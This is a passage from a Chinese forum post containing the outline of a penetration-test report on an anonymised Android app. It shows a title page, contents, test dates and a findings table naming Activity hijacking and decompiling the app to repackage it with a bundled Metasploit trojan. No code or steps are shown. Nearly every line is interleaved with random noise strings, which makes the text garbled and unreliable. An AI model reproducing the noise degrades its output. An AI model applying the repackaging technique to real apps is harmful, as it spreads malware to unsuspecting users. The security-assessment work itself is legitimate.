找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4304|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
. a" F2 B: K3 p4 O$ n* N- L 7 x& v6 b6 Z7 D% I' y% {- H

5 g. e B( G N- H7 x" F H1 f: Z( T9 X& J6 g" E; ~
8 P: L5 G+ j# K: }/ h1 ` 8 o+ X: l8 O0 t& T

+ j& F- F. M; ?; w3 [ : }) C- L9 q6 T- f
; A6 M8 r9 \5 e" Y) u" V 0 \: {2 P7 {: c9 r- L) b

. J& T' L) P. N2 H/ [3 ^ / }$ \8 H# [& c, I 文档编号:                & `/ g% i$ E& S$ E j( a ( K) _% f. i( d/ g% B

1 K, l# ~; I6 G x5 Z: P 0 M/ A3 t% E' b& X

2 ~. V' e6 V, L. N |8 {& W # ~2 Y1 X/ `% k9 W. }; {   7 S" c! e- A+ f9 e" n+ w4 @5 b* R6 T! I

, U' k9 t2 E% k# y) \! p; h ! r, P+ ?2 ?/ m

+ g% h; q/ l1 m I0 ^$ o4 R9 m) {* H( | A7 W0 g   ' v0 F6 _1 s. F+ a& ^: P / S `( E6 y1 J9 t7 `! o

$ M+ n2 g6 Z- d . c! D5 {, t9 N. [+ q$ V% _

# L( `6 y. ~( {- T' a% ^! [! \ 2 Q) {2 q }/ w; ?0 M S: @   & T, ?+ {. Z* V7 j9 c# Q " T- d! n" T- @, \2 n4 Y- ?& a3 Z

9 \1 n5 J) s5 d9 P7 `" v- _4 r 0 F! r, W8 l+ ]5 F0 O5 N2 W/ k

7 }* o9 A- M. `- y$ o: M / w1 c( x- l: _! F   2 o: C; Y0 R* k2 v6 q5 d) M . d M8 J! T/ g$ g$ Z

/ t q& o9 I5 u+ I; ]3 s. U8 i5 o2 u- U* Y, Y

3 S% w, x/ F3 A, X: z $ r% `$ F- H- q5 {* G   $ t" b0 D0 s( u7 X8 \$ W: _# P * h* o7 f y. r9 c/ s+ _9 @7 C

/ z o7 _/ V9 _8 [6 Y8 w+ L , v5 h K! J$ ~3 v

2 y$ h& [! Z. ~ * H9 e& \+ J% x4 i z* u 某某某APP渗透测试 - e( \5 K8 T' h % k. n5 P% U. m$ T0 W4 L& K+ j

1 c$ a9 ^0 v0 @" A1 R/ ^$ q5 ]8 D# l" L( B$ q" S$ P' |$ H

; F% [+ e6 M. H1 W8 J& p" l. M D$ q8 ]. R n' o   . a, M% z( n4 [/ i+ \( ] 1 M0 C8 F, D y5 `# D

, w4 s4 T8 _5 e( n7 n/ z" ]/ b, e5 L+ m, m2 a0 C# |: d, O

/ P, B* f, L6 M# E3 a3 R / a' S4 s* P" m2 v   4 R1 w6 M( T; u4 }/ U4 j " B) {( T2 Q+ H5 z7 |; x

) O2 D$ b4 z+ r6 X& l 2 B. F9 ~* n1 j$ E) b- |

2 H1 F& g. ?+ G/ _0 L) i. c) \# E# d. ?   0 H/ D7 E8 m/ B( g ] , L5 c p; p5 S5 I7 N) F; \+ t# U

# l2 F9 K$ a/ n 8 ^2 F# o+ r [- @2 U

# g) }" w; ^% r: y4 o& e$ ]$ ^" e8 n" J$ ?6 h- O8 Q& q   + c- U1 U' L% ~. F- y# H. S3 V: P$ }/ B* ^

9 |8 u, ?* y2 E3 d5 p 6 t9 O& A1 ]: m7 Z

% |4 |, W- s8 b5 B5 a9 o1 e/ h$ F 2 @; g, e5 `$ u: @ v; {2 l 技 术 报 告 4 S8 `( J* ~. }$ ^% o" `! f9 U$ S+ @) U% K+ w! u7 H

' E, n# ~! S( }0 w3 A ' H7 u# f! m- l

: S$ h8 ^! ?7 s# e, T* V . r2 H& [" T# ~ q# E. @" y) B   ; V' c+ d, S% h) q1 f" Y8 | . k- z6 _8 X# U: D7 P" M

$ E: ^3 K& z, ]1 e' K0 m2 R9 Y" j1 v. A R1 V- {8 W7 B1 q

0 w8 x' G4 G9 `: c. @ ?9 q+ P K- b) P7 h4 U/ |   ' i3 z u: W- w5 @9 m1 z$ B# K( j# d

( B6 V, @. j; a. {$ |( f + `1 E/ n" C! J& l

" ~8 a" b; v0 J3 ^7 t3 L0 G9 I2 Q % {5 o2 y% s/ I1 M: t   & s9 E9 h0 c: s+ Q3 v$ ? * p; d# l/ l6 @0 ]7 N/ K

6 S+ x# f" S- p5 L 2 j. k& m3 a2 {' Q3 W

5 R* ~: g) M% [- x8 P9 F/ T3 z/ y ) V( V. r& G+ G: V   0 v7 p! D; f/ P2 J) t( C" W3 p* U8 P* G- h; M( K3 t5 w

7 c0 Y: c! F$ |0 _( x- W+ ~ ; C* _6 ~5 Z/ A: |2 d- c. \

2 z9 C( \$ T, U. w/ V4 h ( ?" b* i; |8 L2 m   9 _" U( L! t/ z1 M6 q 5 ?% f' X; i0 j/ y& L8 ?9 F) P

3 K9 E: q$ `. F0 ~6 b; L- w, w$ A5 [& J1 ~

T& W5 x2 j# u" F3 w- q" ^' e Z% y) y, |9 u1 ^+ Z# Y) J   , L( U( G9 i- M$ m, L# O s p5 }9 Z; \' w

* u, X) J* w/ N6 l% l* v& Y- L0 f7 ]' k* U, u( P

& i; N6 i4 u5 E u( K$ M! T# d( R8 H5 }8 f3 q7 G   9 G' k2 V5 @2 ^& _5 Q5 |4 W p. F9 ?: I* J7 \/ A

& j3 y/ M0 X1 g; C) \4 ?. W. f' Z' b" \7 N5 ?% v

, W, s1 ^5 u7 b% P8 @6 ~! s; O8 b4 z, w9 Y" o) x   " ?" m2 A0 c u + D& x/ R1 k. D/ ]) o! o

2 c# h3 U- ?/ v4 @" f ( p' X6 O3 |9 O' M6 v" M

2 V) D* k9 {+ R& q# C S8 l, ^( J! L1 Y   9 ~, S, ]% J2 u: h6 e! n' s ' }5 s3 l% V) I9 D1 k {: c

- }5 q/ U1 D, L6 ^ * E7 _& {6 R/ s8 L3 ~

2 d3 d+ p, w$ e+ G . i; I* |+ j2 F4 _+ l: v! k2 {   0 s1 v% a( Y9 [6 F 0 _/ H" }" D$ t: J+ l; |; E

) A" }! _& P0 I& s , c8 \; I: U2 w

$ l$ `7 q0 i+ E& @$ ]( e1 @5 q# y; S. j- V   % B# `+ L% o/ \2 j- z% C/ U& l% V 1 B% T) O& w" x* |0 c

2 q$ J% L, {; r. ]2 m) n ; g' w( c0 ^# H8 |" b+ X

) K" s: O$ O& F+ I7 ^$ V) C$ l6 T( x6 J- S( Y1 z! V   " c* G" h9 F9 S; O . o2 o' b" j5 L; m# W& v0 b5 q

2 w0 y% H- Q ~! w* ?5 [/ p * ?/ c" c( D3 @/ f

8 T& @, H3 g# t2 y; u( ?2 x9 R3 x % M; y: g8 s+ Q1 {! q   + c+ i4 I( c* K' G6 M! a0 k$ }( q5 I : m. S! F9 n% v; F# |! c2 f

% n; w A; Q) t' b* I) ]! h / P2 M% O N' u/ ?* t; V

7 t7 A# l. B( ]3 } : ^7 Y8 q& M( c" U$ S& _- W   6 y6 j4 c* M2 c! {4 ~ 8 ?# k' G7 ?3 M* @

2 g Q1 j5 H5 h " d* w( b4 k- F n4 V% c* p( m

9 q0 X. E9 d+ g9 V * H/ b2 d7 q0 J' T1 J- U3 X* Z' c   3 `2 p1 d) N; L; {4 }$ N# R3 X0 c# A5 o% { 5 R/ B1 {7 H8 y1 _6 Z; J, n6 \

4 o8 x) d$ M! s1 | v9 ^; B 6 ^) x1 s- O5 E4 X

% b1 E. E" E+ l5 d( h % x; G7 s7 T1 B/ `# f5 V   & l8 h9 G" C2 y6 c# z & @/ p$ G- [; T( ?4 T! o2 e$ F

3 Y' V) A# k5 z - u6 H$ Z, b; U" H

6 Q. \% ]! n. | 1 A7 R% ~* J8 S% g# ^: d7 d7 Z   1 l& `! H( R+ U8 @2 q6 `# d0 m5 j2 C$ U) E6 O; a$ C

) t- m! C* l K# }, }; T* r- S* }) r) h, \0 M# S) u

4 c `' K& ?% J' P9 _8 Z # c9 Y' R% r) g) J- p6 o   % M) u! G1 x/ d" F- Q% \$ p ( O; a: j: u8 F$ U/ e, Y

! ~9 t" E: K& e& ?3 \ % p& x, L# }/ Z: I! _( V: t( t

( `( P# a! @+ M% p$ a1 P7 ?5 S" s7 t Z. }# p, c 二〇二〇年 1 t6 Z& |! F1 h1 f7 |7 f" n7 k/ @) I$ n4 a. Y4 R" a

' W9 G( Z, T" B7 }9 Z/ ~8 B! S n8 K# k3 g% ?
& I' Q( r: I& U 3 E( b7 q8 b% h; w$ c, @
8 B5 A2 i& p' T2 `0 l" E1 B4 h5 t1 `* B2 `. N
) |4 \( Z* L& G " _( k2 M5 g( V, [5 U
7 Q- d+ U1 E4 S( c$ |8 u8 E, l2 t& u3 I# j0 ?
$ ~' Q* s. D# b$ v; I 4 C( C" _% W2 ~
4 E! V8 {' ]- v. O3 a5 U0 Q/ Z: a & j6 R. a% C6 {% u
) ?/ p& `7 x( b: {6 J! ] ! P6 ]" f1 F, k; G" @1 J
9 Y6 M- `( ~: O; Y& W * e' o7 [ _4 i5 z

8 {- p6 _: T3 I9 x- M' t- `7 y9 u! T0 v. Z 目 录 % s$ v) G0 m' R X9 ^. E4 e, j7 V7 {! q0 n8 \* Z: ^

1 j- U4 ?, t& Z1 N M1 \ J7 J4 v6 n2 n* F( E" b8 X! |, C % I% S3 f8 y; K$ b( \ ! W5 p% t$ R, @4 U

) j z: [; @# d5 Q/ \. \: x# n* g5 b3 |   . V! ^( {7 N1 D 4 s3 E- ]6 h! I; q0 V. Q4 b

) g4 S- J" C) q2 j2 \ ; R" {1 X4 j8 y j' [* T0 n/ a

- b' }" K# F0 X6 T; r! Q% B& ^5 S7 N% r 1 概述... 3 ( @9 U0 c7 ^7 r& H' h' F7 \* l3 q* B' {

9 S- y8 d4 a" b. z* w - B; t' V& j) m% E T% ~& \8 G( [

8 I g. K4 R0 [. |2 M 3 v0 S+ K9 ^2 Z' H. W: O 1.2测试时间... 3 % `! w. P/ t/ X" ~. k9 u( v3 o) E" ~3 H) a

. K0 j5 {$ e7 I0 F& P & g, J( c+ w Q \* A& X

0 }2 {' x' j% j3 o( e6 c$ v) G$ N7 {2 z1 C 1.3测试对象... 3 ! y, `" \" a6 }7 g1 C! [ |4 i; R* I6 r# k

* S$ m s: G+ V6 F5 H/ @# S4 G 3 U8 n/ o: [3 V5 _; @) p

) Y# |8 E _1 Q3 U + f5 k/ \( |; q( m M' y! e9 g 1.4测试结果... 3 1 u y0 b" C3 I1 A2 l! d 9 c( S* d) m) m4 C" C7 {; V4 m1 c: J

& D5 J0 q7 I: @1 z T , c2 m1 |9 j" m+ v$ \$ S

- H, F. U/ @8 U1 X $ z" x. f4 L( Z9 X6 \% {( q/ ~$ e 2 检测结果... 4 " b6 r4 E$ k2 U" Y; b& J / \" |# L' ^4 g- ^ @& B

' G- I, m. Q2 b: W- X4 p& h1 t* P ) ~' Z6 `2 ?/ H+ m$ I

1 D' m! I# f. z9 W4 A% R. J" R- F- D3 e- M7 s3 s( U 2.1 某某某... 4 2 L3 U: |6 D; X( H 8 }$ U5 l* i6 a: C

j( \7 c4 [$ ]" X5 b4 | # {- D+ t4 C0 g

z3 s- |+ @5 n! i: [1 w1 z 3 c, X4 l( h0 k) ~# b 2.1.1检测目标... 4 8 q( `% i4 t7 ]: x 7 f- K6 U% U; i+ n% z8 P0 r/ |$ K

; ~' V) X4 y, i" R 6 g0 \. j/ U- }* W$ x' E* n4 a

9 c$ ], O. S: @6 a3 L2 b ( A- y u$ Q+ P( T3 Q8 J 2.1.2检测结果... 4 & q8 b+ x2 v4 n+ T- e3 | ' h- P ~) Q3 `0 B3 }9 r* n( n, L

8 k* U- n5 Q P' k0 }- ~, d4 v" v

5 K7 c9 m/ L) |' t! u4 R + u8 p, l( b* W3 | 2.1.2.1. 4 4 P4 V5 z) f" F! Y& c8 [. t : n' C* c( m) t* U% ^' o2 `+ z" @/ L

* C5 m4 X8 K& y / D) }. B! n0 S! z2 {

: a8 p! i5 J T. ~& F" W& E( D1 j, N# E6 r9 D 2.1.2.2. 6 2 n1 }- n* e: [" d9 c% w! `& z+ \6 f. a6 W! K! C: P0 M5 E

! T2 g2 T$ L* u- c Y. T% q [0 h9 E7 {& `* m& v0 W9 V. P7 z

. X: p* m4 k8 }) _) i, ~& r% q% [$ {) S0 i 9 q Y4 Y- \1 B: q! G% C, Q# b * _: Z/ r% Q9 q& H8 r9 q

0 k. x" V5 u* i% Y 1 l3 W( B; j' s' D* I) {
* T7 `/ _" }- T q3 Z # a, L+ j% u% @9 P3 W! U3 B8 }: [
/ F7 O0 i3 ?7 N: v+ E3 p& _; G* H" Y) e
' w T! \8 L2 j' @6 y ( ~, p$ S/ C" V4 M
+ s5 B3 N% [/ Q. Q& | , G( d( I- k3 {6 C% [% m

5 f4 r f* y' F# G% y# |/ D4 g1 O2 {9 s 1 概述 ! ^' o( [4 r- ^$ U& [ \6 G4 u6 {+ n5 f7 ]3 d# p2 B3 R8 u7 Y

7 c3 r' z- z D, A % ~8 {/ y4 [" i- |) r4 n) k( b

o* J2 o: I2 Q5 ^' A! \. z4 z8 }0 j! p3 |3 M% K' a7 O5 r! | 1.2测试时间 ( j i9 G4 M" h* D: _ 9 p) Z) M* G: g2 c7 b

# k4 ?) R0 S8 F4 s/ E# O . Y$ L. W' \6 L $ y% ~1 A" b. C1 I* G4 L9 W" M4 T( X) L0 z7 {4 t, q- a8 X6 ]/ R& \& C3 ~8 K" y& [/ M' A# R4 ~5 y# Q( H* N6 g7 ~3 s' U/ N9 o, M+ [7 I, M t+ D! d5 T, E' ? K: M5 U, T7 ]* F1 i0 p: I7 U$ p# C( W4 r/ l: c7 j2 G+ J" X, r. v. u% x1 t- w' i# S& z9 g: p( w6 r1 p4 c, ~6 K2 b# U% p# a2 n' x, a5 R+ J9 T, P' _5 k: g! N. a) W) Z' f( f' s- O: U! `" l" m- @2 p0 f! z @2 a8 L! x) R. y, \% R" g- s a: ?9 d5 w" S m& P4 l/ Z6 k/ V9 A7 M% J" f9 w* u9 Q) a) C9 N& ]% r6 i2 [( O0 J7 F6 g- @- X; ~. a- B: J* l, g( _" e9 Z- h1 q9 V* |* ] I) |, h: u# f* s+ e# |. M0 s% U" Y, |$ z% n; X! j/ h* _; W9 c+ H* O: X. V% Q* A- z6 n$ o) q6 O; h1 ?& b! t; G8 \2 M- _6 Z# c- q! A" L% R% w8 d( P' u; L3 V; n/ V0 t
) i8 a/ ]. w F/ Z ' d; S X' {! a# ]3 N- L- C, K

3 m: x+ I/ A- T; c6 d1 C 6 p0 t! Y0 \, Y( c. S 渗透测试时间 5 Y8 {; |/ R5 b( ~2 n + G- \4 H2 W& W* \& y

! T+ ~5 B) g; e3 l, @7 c: f+ \ 2 ` s- t" N% U D# L7 @
3 {" v- b; |7 G' s3 D. P, a. q: T D b. h) a8 a& N/ K

3 ]% `& `3 V/ E s! w! A; m! z. X 起始时间 4 F" K3 f3 H" a) w; A9 r) N) ^ + t" P& K8 @1 [; W O

! j3 [% y' |4 Z' Y& H 1 @: S* h8 A; |
- _, E& G2 Q2 b( W! g! {" [ * |3 T% x: x4 R: `

4 J j& ^7 C/ U& ^' B3 y2 O& }) h2 F 202046 |' K: d: r3 J+ k }9 ~) P' E7 X; ^# I2 r. ^- g0 B* l2 I, ^

$ m p% L; ? ^& Z/ w Z. J ' l3 B# @+ } Q6 C9 T$ h' |8 L. J
0 D ^( j& h z0 I7 ?! G ) `! a: c" g# h4 m) \" f

" P5 ~7 M* ^: \0 ?, M5 L2 ~" v8 @ k: Z2 N; ~% ?) g7 [+ s 结束时间 4 u) u* _5 z% n* O+ j! ~5 j3 I ; E: m/ ~2 I& q3 ~% X8 y% Z/ t0 g, J

( s0 l' X% j6 L# Z B- p / p" ?' L, \5 s- v9 L$ t$ G
8 P; l* K2 U1 {7 v3 t3 n * g2 N4 }8 C9 n0 K) j* B

' o Y( t8 u# {" l% N @5 V. E H" b$ D+ u: \% |% U+ ~% S$ X 202049 , Y; z$ F' A, I4 S* a) `; E: L4 L0 _# U+ e: m c

5 h& _. I' |4 L8 |2 }7 H ! c4 D8 K [+ r }& G
( ?( {. S. n0 g7 _ ! F4 D# L: b: O# ?8 p; e9 a1 ?& u

; |1 h1 d/ E/ S5 u& d" A. E 1 b' W( X) [: } 1.3测试对象 + v3 J7 a4 j7 c, Y$ ` # {/ z: q1 ~- |" j7 Q! N- K

* r0 Y0 }0 |% N 6 t* N. ]3 ^( G/ r! \# ^

! ~! q* L" n3 x v& d- K, v, M8 k# \9 Z6 F$ O/ G q+ ?5 c1 l 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 2 |5 f- r9 I* P3 A* \. P+ P! s$ z ! i* U+ w" G/ {( Y' y+ t: [

' V: ]. V7 J' l$ |& k2 Y $ }; Y0 T7 c, E: |# N

3 p; @, f; k: c$ Y- N2 m& k% M2 Z7 Z/ U1 [. _; m2 o$ J$ z' O 1-1 检测对象 3 }+ o% F$ V" e2 Y / w, I3 @# j* n; D. ~

) n* H" O( }7 v1 n + B1 r Y) m7 W / n- F! X- ]6 l7 i( e6 N- q" i+ b2 z7 u# h% w3 Q% |7 a( g: R9 B/ M) O7 C' m' U3 c$ W+ \; Q% P" h* f& g$ Z/ m6 I, A! G, l/ I7 v6 d* }7 @) B/ _4 A7 v2 z$ U3 V$ I+ X8 W/ b% ~- P- Y7 b/ @" b, o! Y5 I H5 j3 A& y, w9 ?$ S- W$ K& `& j* m6 }9 q4 g0 R, H% {0 p& ]7 n h6 _7 i, _8 T$ ?0 j+ ]; c! w# W$ _$ S" a0 D; b- q) m7 _7 u x1 r, F' \+ ~# Z# k% T( I$ K! z7 m3 \9 `3 z0 Y( N; b" K6 x; d$ ~- `1 i: E7 z7 ]; h9 R* G7 r; z) ~+ K' U9 ?- q+ N" P5 }. a2 J5 u7 D; ^' \# B4 H6 x' u/ Z& [8 V4 |7 D1 @' G$ J3 E, N- ?7 n9 d7 }. y. P! u) W8 v* m2 q3 W" ?" [- d4 v" Q0 A3 b" e5 O0 E* G3 a* c; ^- Y I. J9 S- K# T, {8 |0 Y, f" l9 J& c1 ]1 f$ r3 F. V" k5 Q( C9 D0 ^& h' _3 O/ r3 `' l9 u% q+ _9 v5 f3 N5 I6 Q+ ~( i7 Q; Z
! V8 y' ]. x, w7 n2 m" I 8 ]$ @6 J- O1 Z0 i% x

2 F# F _, a+ I# K) a ) T7 E7 Z7 L- C' } 序号 ) X) [( p. s2 F9 `2 R 3 A. y* C* C+ y5 [! P h6 f

; i2 _ u3 A( J 7 j M9 W( t2 ?
1 G7 V! m/ c7 Y$ U) A J- c8 |, h6 z* L# A% Z" F

7 k6 `: p# ]# H5 Q' ] ) h7 g- ~% `, ^7 a# t 测试对象 5 I- a7 Q, v/ s7 |* M: Q; b ; }5 h! j5 X5 ?* N% P# L

9 Y. m/ n) B/ }+ Y0 C % e! i: w Z6 ]* @8 s
) Y) O0 }: o. g9 f! m % n& |+ t4 [$ c% _3 X

! L* T& c, j* a4 M: H& c $ ?8 f5 z, u8 P6 |& p 测试地址 t& F+ `0 }6 T9 r9 S % l2 [' F) w& E# e

( ^5 g1 s& F* M! {$ r / T. z* I4 W6 I
/ ]. c, X R" y) W! ~$ b! [# [, x, r) h G l; C( {# r

. |4 [! o1 q* [+ P9 P8 b: i* _# Q+ G2 s9 H2 A 安全漏洞 / w1 o+ A! ~2 _3 L 1 @& Q9 A6 ]7 w" F8 X$ L4 T. z+ Q! L3 H

+ F3 y. G3 f; a, A% F 3 d# |8 S4 i2 H; k* d3 C. _# c' v
2 M6 U7 r1 B y0 P5 j' y ~! T: @. _# L& I2 l( H

1 ]/ c8 @3 a6 P& x; z' W: d 3 @# ~& l9 P' t4 X* f* q; x 1 $ h* z& G" r3 A) N5 F ?8 @ ! c" H5 F: B7 `3 C

0 X( Y/ z7 |$ l# h2 w ( ^# x! X1 U8 H0 j! x% Y
; e: C8 s7 W3 Z5 P1 }/ ^ 2 P% ~0 m- e5 Y- R

. k I2 o3 ?* R* g ) k9 z, \% @+ u3 p+ f- }+ L. d 某某某安卓APP 2 k r3 N3 s2 _/ I+ S; {% d , M; D5 B2 x% p$ P

k6 @8 M" F6 J3 M2 h) l N+ U- R6 ]2 {. g+ `, _* z' Q3 ?& x$ W& c4 V' g
5 T; e: F1 Y7 V3 Z3 o & K- p r$ S4 }0 {

; B" ^ R' I0 c7 i" N$ ]* A3 Q2 T, G. ~$ Q8 B   2 T K+ \3 s4 x4 p4 |' v & o; N- P4 w$ B% N) e, W

9 {) Y9 U$ Q# `3 U " F. ~4 V% |; B7 N( F0 y
/ O; ?2 A0 d, e' V/ {' Y! b- T- S; s

+ J/ T" t/ t Y( Y# ?6 F 0 s" E6 p3 V: o# E' B8 I 2 # l( q6 F8 O1 y9 V3 f 8 ]! d( N W/ i( {7 \

! N V: h+ C* L# H h - d. T2 U4 n4 x5 p) R _
4 o% w9 g i" m2 R7 w, i: J3 i3 z! @& q0 h# \$ e

& g; W5 [8 I: |- j/ \ ' J$ S# {1 O( N9 K* g6 P; c' _ 1.4测试结果 7 ~5 o$ R: ^0 p6 v, e 9 g6 |% U2 M1 w9 l1 d

% z9 n! w5 l/ D, h% Q ' O* \. L4 S" l5 t, l* W

" X! M- r7 Z4 n: [/ K" E% G5 v8 U) k ( n$ B# n( `" Z1 n- |: u8 o+ i8 M 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 2 Z- e5 l/ ^& q/ ]/ v) X0 z ; b# {- w- c1 Q! }; s0 B2 d4 @

( G; H) A& {: Q$ V- o" V' q( ^ / e- E( Z' w) ~6 K$ h7 R9 V

2 G9 h9 u1 a9 j2 P4 @$ W* m + l/ e- a; T$ c) f- }4 s   3 @$ H5 h* e$ o3 ` : K" w: R5 s# V" q2 _+ c

. L6 O$ G9 U. i, z8 h( L8 Z6 T: v1 q- _$ b. R5 \8 {* k& U. |
) X1 Z; Y5 Z; i" {$ \: m* p4 d7 w$ I6 i) K8 R! o$ [. } " e" z% _; h! ]% E+ v6 Q3 r8 B: [2 }* V( B* P2 g$ x( ]! r! ]. o; m) z# [2 d; y1 s: E/ D! F- ?1 k6 b3 h7 p3 s6 M% Z/ I" }/ P+ a7 H; [4 X% C1 E/ A9 o, C3 p" a1 {) m0 [1 r, C6 t* s' {) q+ W& R4 a: w6 W* A; g. D3 }5 H: v8 v4 I) {* M8 P, n H, O, ~- [4 Y) L+ O* G& B* |5 E3 d+ P5 z }' a/ M; ~* y' V- \9 b7 i5 Z+ P4 t6 P5 h6 p: s5 P, \" w) @; @1 l! V5 Z2 R2 R+ d; t; ^+ S5 }% ?: M2 `/ `: `) c) F% Y2 q2 e- o4 K; x# i; F9 K# ]9 q9 m" y. f( Z3 P" Z) f- u- t5 m9 x9 b/ j$ M- i" f( t( u! h D. n( y0 R, T% G ^* E' `' }4 B. n _, g$ c- @7 b5 Q7 S- n6 q+ |& G/ A9 c( q% j8 C2 i! A* S1 [- H/ C: Z' u! `' a# K9 |. N' q+ {2 x# l" x0 `$ A9 A. ` \& ^9 a# f9 v- C6 p2 D- k$ b+ E& T5 P3 T$ i6 N; m0 t ~' U8 D* N, K5 o: }8 i( P0 I" d1 y0 `" |9 u1 p) q+ y& q+ @8 w3 p9 F" C1 k/ Q6 l* z% a8 {9 ?0 h+ P2 H3 {2 I* {% H/ V* W3 a" x5 T# r) K0 q/ ?# U# {& K5 O9 Q9 q; \( M8 I" y/ M( C S- }% f. y7 [0 y+ Y5 Q. f5 B4 K: S3 d4 @+ w, }! K# |& W# X7 t, F2 X3 z8 V* L1 G9 o- V( y; m/ Z; E1 j" M O' x$ U7 Z' P' K4 {) S% C! ?8 _2 k7 d$ J. G/ r; y0 k* n; J. l0 J1 I# b; \9 u, I9 n6 ?0 P, n* [- U3 M+ v4 U( G9 z: x; b* J8 q4 M5 d8 Q$ f- z) ]( h( F ^2 v3 ~% [" f) ]- [# ?0 X5 A n. E- a4 o5 D% L, X) Y3 q9 e, C( u+ q) M- b! H0 M" s4 F
1 i* T# d1 s! Y6 [3 z 9 g1 @& B% b- q @

1 i- E+ G; }% v" J4 O + r1 ^& x/ B4 H3 s) I8 u 序号 % J k& ?: V$ h+ U' @9 E, a! o- U I+ _2 F* X' c. d; I: d

( S. u: E( N' W: P! L7 k 0 K" h5 E9 U- j. h1 S1 }1 W
2 P; A1 W; u T$ I/ w2 u' I 3 i* m5 s9 z7 D

0 i! h, [5 ?8 P3 N# _+ m9 i4 ]! f+ s( l 系统名称 , E# m: R( c' e+ u2 H: S1 `# ~1 |" G9 B

" p. w# h1 |0 S' Y0 y& p( m # P3 D; V6 K S' a0 m+ J( [ W+ V
3 N( f" d8 x( i8 T / [" Z* S6 q4 u2 u- O# I

7 W0 ?0 [& m3 c/ b/ L! l; P& O0 X, a; U3 ?1 S, ` 漏洞名称 " r% l1 R$ E- p: n @% L & f( i+ F( a6 Z! d5 x

5 @* o' |8 F9 H. T3 D% O9 }$ p- r
+ {) r) p' O2 D! O1 X# o; u* k: ~( j6 Y! {2 k; E

+ c% W; F" J2 m) h- F B. B# X* ^ " X0 {; m. i2 h; j0 ^ 漏洞危害 1 O8 Q1 G7 H0 C: I6 ?; u" E5 ] ! O0 H: P0 H: R1 I

0 k3 E3 @% z3 y `; V' ?9 l! i# E2 W m7 |$ k/ o, e% y" U3 ~8 S" q
) _( j% k/ p! D; l* T , R1 Q8 o+ ]' N1 v% g1 {

$ Q! v) c+ E# N- M, o* w5 _$ d* L% P 修复结果 - [* i$ K% g5 Y, j; n/ z# O: @* ? ( E: G( @) n. U+ g0 s( i

+ `( D1 _* X9 X/ ^+ q3 a 9 D* a3 b( y* `+ O
" R- G2 h6 S7 h( ]& C( ~- Z, ~5 w/ v9 c. u0 s: O

3 |, M) W B8 |/ L( N: q4 e 4 G$ u$ L. H8 E3 ]5 ~ 1 1 z4 ^ N; o1 z$ P) a- Q$ C: C & ?6 I8 O% p6 O% l& _. k/ j9 P

( ~0 i' A* t K, t% Q5 K. M6 c8 r& H( F
, M, ]' ?3 W% } , ]6 ^( d; e) _9 D) s( {" F

% ?/ |6 h0 Z. r. n8 o) T* Y # U3 W d% p% C# |, q0 W( P- f 某某某某某某APP ( o% C* o* r; C8 _7 k5 O ) {* t7 X7 ^4 p. L+ X: ]

; F* v$ v2 A7 ^ ! L1 ?" w& ~# W6 M5 n
$ t9 M3 W2 o4 |0 N4 y% | 4 B E' u% u% Q6 @) z8 j; {

* C: N- |1 n3 L+ a/ d6 @/ R3 c7 Q p Activity 劫持 : {& f, b0 H. r" r2 L. r6 I ( }0 P) ^6 e6 Z- a7 w: A0 h4 |

6 T% s- r9 Q N 8 I+ p, H. N7 g

3 y7 O4 `% M8 H3 q1 X+ t, `3 H. d7 y; o( W) {   8 S. c' x7 x9 t$ E0 x# p7 ^ 7 i* X6 ?7 E% z. w9 C! P' J7 q

8 H- N N$ ?) W8 H$ {( t2 X3 h / T' ]9 E+ U9 H
1 O4 R) Q$ P( b3 @: w/ |4 v- @( [! u

* J9 a, J* t+ h; s" ?: h, p, }( M; q 1 X) c! J/ r* d( c ( R& s2 Q- V5 o: j % |, A- @# P9 g- V% |" _0 j

& S- p- f- J5 F4 {' m6 ?7 F + J p9 Z$ N1 N
/ D: S/ R4 ]& o. t) c0 w/ j 8 d& q& ^6 ^ B' A! n* Z

1 I1 ]7 H2 ^ } $ \* L1 m B$ H/ F$ R! A- Q   1 f) C ]1 y3 N- Q- E0 r) ~* @ $ d0 J3 c( J" ]0 Y: H5 x0 T& _

; n1 Q5 }6 A# H6 l; W2 M ; w& \. S; g4 Q& R& R F
) \! P* {3 v% J2 x- z$ n8 }% E / A' @& e$ P! | v

b5 S3 g& A. _1 b( A1 f% \ W" H 2 ! X7 r. D2 L1 A U% B+ B8 Y1 L5 G2 O6 }6 {! J7 ` c: i

1 Q& o4 W) K, d! O: U ) @5 X% s8 J- N7 F& J
6 p+ s* R7 x* E8 i+ G! R, e& U' t* L. p" S2 T1 W/ e

% r7 v4 `) g1 n% j0 I ; U& ^) [1 q2 V4 K0 v) d( t 某某某某某某APP ' V/ m$ f" ^. |- B3 H 5 z/ z% G( q; p; b, ^* O! x2 } R5 }

- }4 Y( F& y8 y8 d) i7 J9 k5 A @. ]" q 2 N: D+ C* N. P. _ l
) ?$ m; Q0 K/ x2 j+ n0 }5 A/ p: |, P: e! S `: G- e7 @3 X) n+ y* E

6 L+ e. x" H( h f' E$ y' @ ! u5 V0 c2 y4 E) b3 q/ r1 B 反编译二次打包捆绑木马、篡改APP代码 5 W. ~: z$ F& G S6 n% M, V E - x' W& G7 c+ ~- F" I3 i" c

# Q" O8 a9 p. T7 S" Y3 {% { / _1 M# Y# |; D3 j0 ^* |
1 n2 f2 A+ u" O+ E& w # G q! y9 `0 z: v+ x3 ]% L) B

2 T7 d" W; K2 L4 T' t) ] * {& z( k5 U# t( |+ Q# x ) a/ v) W- z$ m. t, s G, J+ o( S; K$ l H

, j- F, R8 B" B# E* c- S( B, Z M- d * K# k' q$ B( ~+ G$ I |
8 z" U- c; N1 o) ~: F$ S+ K* D) C9 N) T) W& _% r- r8 v

* G' r$ h6 [6 Z9 N' _ A/ e2 k, T/ @% i) L+ E: F   v& a6 @+ s1 U1 b1 i4 e * J- K* m1 `; z7 f

+ U) W; R; q; F & u' w* Y1 S6 d r
8 i2 m1 c' e5 W9 e+ C' X # c4 M! O. [; t$ z" S
9 E$ s8 {8 b' f1 f. c! q 5 A" P4 m5 U+ i& W2 C2 N, A9 G

: x% D! M! s: C6 b- z " o% @7 B7 I1 k   ' ?7 W9 S( B ] B, R% g! d+ u7 S ) L# l) t# W s2 C

